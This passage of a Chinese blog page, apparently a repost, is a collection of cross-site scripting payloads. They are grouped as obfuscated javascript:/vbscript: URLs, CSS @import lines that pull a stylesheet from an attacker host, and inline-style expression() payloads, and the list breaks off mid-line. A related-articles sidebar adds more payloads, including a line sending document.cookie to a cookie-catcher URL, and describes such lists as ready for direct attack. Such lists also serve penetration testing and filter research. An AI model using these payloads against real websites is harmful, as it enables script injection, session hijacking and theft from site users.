XSS payload 大全

最新推荐文章于 2024-05-11 21:35:53 发布
最新推荐文章于 2024-05-11 21:35:53 发布
阅读量177 收藏
点赞数
文章标签: javascript ViewUI
原文链接:https://yq.aliyun.com/articles/616779
版权

收集的一些XSS payload,主要分为五大类,便于查阅。

#第一类:Javascript URL
<a href="javascript:alert('test')">link</a>
<a href="java&#115;cript:alert('xss')">link</a>
<a href='vbscript:MsgBox("XSS")'>link</a>
<a href="vbscript:alert(1)">Hello</a>
<a href="vbscript&#058;alert(1)">Hello</a>
<a href=javascript:alert(&quot;XSS&quot;)>link</a>
<a href=`javascript:alert("RSnake says,'XSS'")`>link</a>
<a href=javascript:alert(String.fromCharCode(88,83,83))>link</a>
<a href="javascript&colon;alert(1)">link</a>
<a href="javaSCRIPT&colon;alert(1)">Hello</a>
<a href="javasc&NewLine;ript&colon;alert(1)">link</a> 
<a href="javas&Tab;cript:\u0061lert(1);">Hello</a>
<a href="jav    ascript:alert('XSS')">link</a>
<a href="jav&#x09;ascript:alert('XSS')">link</a>
<a href="jav&#x0D;ascript:alert('XSS')">link</a>
<a href=" &#14;  javascript:alert('XSS');">link</a>
<a href="javascript:\u0061lert&#x28;1&#x29">Hello</a>
<a href="javascript:confirm`1`">link</a>
<a href="javascript:confirm(1)">link</a>
<a href="j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1)">1</a>
<a href="javascript:%61%6c%65%72%74%28%31%29">link</a>
<a href="javascript:\u0061\u006C\u0065\u0072\u0074(1)">link</a>
<a href=javascript:eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")>2</a>
<a href=javascript:eval("&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#120;&#115;&#115;&#39;&#41;")>link</a>  
<a href=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>link</a>
<a href=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>link</a>
<a href=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>link</a>
<a href="data:text/html;base64,amF2YXNjcmlwdDphbGVydCgxKQ==">test</a> 
<a href=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+>1</a>
<iframe/src="data:text&sol;html;&Tab;base64&NewLine;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">


#第二类:CSS import
<style>@import url("http://attacker.org/malicious.css");</style>
<style>@imp\ort url("http://attacker.org/malicious.css");</style>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<STYLE>@import'http://jb51.net/xss.css';</STYLE>


#第三类:Inline style
<div style="color: expression(alert('XSS'))">
<div style=color:expression\(alert(1))></div> 
<div style="color: '<'; color: expression(alert('XSS'))">
<div style=X:expression(alert(/xss/))>
<div style="x:\65\78\70\72\65\73\73\69\6f\6e(alert(1))">
<div style="x:\000065\000078\000070\000072\000065\000073\000073\000069\00006f\00006e(alert(1))">
<div style="x:\65\78\70\72\65\73\73\69\6f\6e\028 alert \028 1 \029 \029">
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
<DIV STYLE="background-image: url(
weixin_33832340
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XSS payload大全
01-22
总结的XSSpayload,可以直接使用,直接进行攻击,各种payload
xsspayload大全.txt
11-29
各类xss漏洞payload,包含:没有事件处理程序、没有空间、无斜杠(/)、没有等号(=)、不带尖括号(>)、无提示,确认,提示、类payload
2024年网络安全最全【XSS平台】使用,简单 payload 项目的创建(1),分享一点面试小经验
最新发布
2401_84301948的博客
05-11 680
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
XSS-Payload大全
gy1bubble的博客
10-11 1432
<body oninput=javascript:alert(1)><input autofocus> <math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKM.
xss payload大全(实用)
热门推荐
Bul1et的博客
01-25 2万+
验证xss的时候总感觉姿势不够 这下好了   这么多  任你随便插 '&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt; ='&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt; &lt;script&gt;alert(document.cookie)&lt;/scrip...
xss常见payload脚本
09-01
xsspayload包括各种标签的payload,类似于字典。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。...
xss payload下载
04-03
多达5500多条xss payload提供下载,方便渗透测试人员更好地fuzz目标站点,检测xss漏洞是否存在
XSS测试payload
09-19
XSS测试payload,收集了简单XSS测试用例,较具有实用性。
xss的各种payload脚本
08-12
xss 各种绕waf脚本语句
XSS payload (大集合)
m0_51186260的博客
10-18 3041
<script>alert(/xss/)</script> <script>alert(&#38;XSS&#38;)</script> <script>alert(&quot;XSS&quot;)</script>(代替被转义的“”) <INPUT type="text"value='\'><SCRIPT>alert(String.fromCharCode(88,83,83))&l
xss payload
weixin_33701564的博客
06-29 348
><SCRIPT>alert("hello")</SCRIPT> 转载于:https://www.cnblogs.com/fanzi2009/archive/2009/08/13/1545474.html
xss-payload
weixin_45095113的博客
11-11 1008
xss攻击载荷
xsspayload
Js_123456789的博客
12-06 225
元素on事件: prompt(document.cookie) document.location= "http://www.example.com/cookie_catcher.php?c=" + document.cookie console.log(document.cookie) alert(document.cookie) <img src="xxx" o...
xss绕过,payload全集
spang_33的博客
07-05 2万+
XSS总结:        xss分为三种,反射型xss,DOM型XSS及存储型XSS,不同类型的XSS的危害不同,有兴趣的可以观看一下csdn上明智讲的关于XSS攻击及原理。https://edu.csdn.net/course/detail/8585里面的修复原理和补丁代码讲的还是很详细的,他的课程还有利用xss获取cookie等。&lt;img src=x onerror=alert(1)&...
Payload大全
Zeker62的博客
09-05 311
目录SQL注入判断注入类型各种函数作用数据库基本库常规方法基本报错注入updatexml报错注入时间盲注floor报错注入extracevalue()和updatexml()的报错注入宽字节注入SQLite 注入绕过过滤关键字过滤空格SQL读写文件python :SSTISQL注入 判断注入类型 //判断注入类型 ?id=1' ?id=1" ?id='' ?id="" ?id=") ?id=')...
终极万能XSS Payload
None安全团队
03-10 6166
前言: 在进行跨站脚本攻击的时候(xss),通常会需要我们通过插入的代码场景构造payload。就比较耗费时间,为了更方便的去测试漏洞,万能XSS payload就出现了 什么是万能XSS payload: 这里对它的定义就是 可以适应各种场景进行js代码执行的 payload,只需要有这一条payload即可(例如闭合html 闭合js) 下面我们来看看 payload长什么样子: jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=al...
XSS常用Payload
z2560088的博客
01-11 9804
1.普通的 <ScRipt>alert(1)</ScRipt> 1"><ScRipt>alert(1)</ScRipt>2.绕过htmlspecialchars方法,先闭合输入,再使用事件来绕过 ' onclick ='javascript:alert(1)'// " onclick ='javascript:alert(1)'// 3.<> script onclick被过滤,用a标签绕过 "></input><
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值